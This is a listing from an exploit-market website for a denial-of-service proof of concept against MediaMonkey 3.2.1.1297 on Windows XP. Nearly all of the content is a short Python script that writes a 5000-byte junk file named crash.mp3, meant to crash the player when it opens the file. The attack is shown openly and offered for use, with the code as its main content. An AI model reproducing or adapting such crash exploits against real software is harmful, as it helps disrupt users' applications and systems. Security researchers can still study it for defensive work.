[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mediamonkey v. 3.2.1.1297 DOS POC

Author
Abhishek Lyall
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13579
Category
dos / poc
Date add
05-08-2010
Platform
windows
=================================
Mediamonkey v. 3.2.1.1297 DOS POC
=================================


#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3
#author abhishek lyall - abhilyll[at]gmail[dot]com
#!/usr/bin/python

filename = "crash.mp3"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()



#  0day.today [2024-09-29]  #